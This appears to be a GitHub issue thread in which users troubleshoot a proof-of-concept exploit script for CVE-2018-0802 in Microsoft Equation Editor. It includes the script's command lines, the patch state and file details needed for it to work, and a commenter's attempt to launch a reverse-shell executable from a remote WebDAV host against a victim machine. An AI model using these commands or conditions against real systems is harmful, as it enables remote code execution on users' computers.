Open securitaydude opened 6 years ago
I think this REP isn't 0802.
I have tried with python cve-2018-0802_poc.py -e calc -o testfile.doc
but it didn't work.
This PoC is modified from CVE-2017-11882's. So far, it has only been tested to start a local or embedded program. The output file's format should be .rtf. Hope you guys develop new ways to exploit this vulnerability.
Your PoC isn't working either. Did you know this?
I have tested it on Win10 Enterprise Edition successfully. First you should have installed the CVE-2017-11882 patch. After that, you will find an EQNEDT32.EXE file with a size of 552,680 bytes in the "C:\Program Files\Common Files\microsoft shared\EQUATION\" directory. Then you can successfully exploit this vulnerability. If you have installed the latest patch, that .EXE file will not be there, and then it won't work.
Can you explain how the WebDAV path should be supplied to the script?
I enter
python cve-2018-0802_poc.py -e \\192.xxx.xxx.xxx\webdav\executable.exe -o file.rtf
to create the .rtf file. After typing in the address of the WebDAV location on the victim machine, the .rtf file is called from the attacking machine but nothing happens. I can safely assume that the executable option allows me to use an executable of my choice. In this case I created a reverse shell payload and had a listener waiting for a connection on my machine.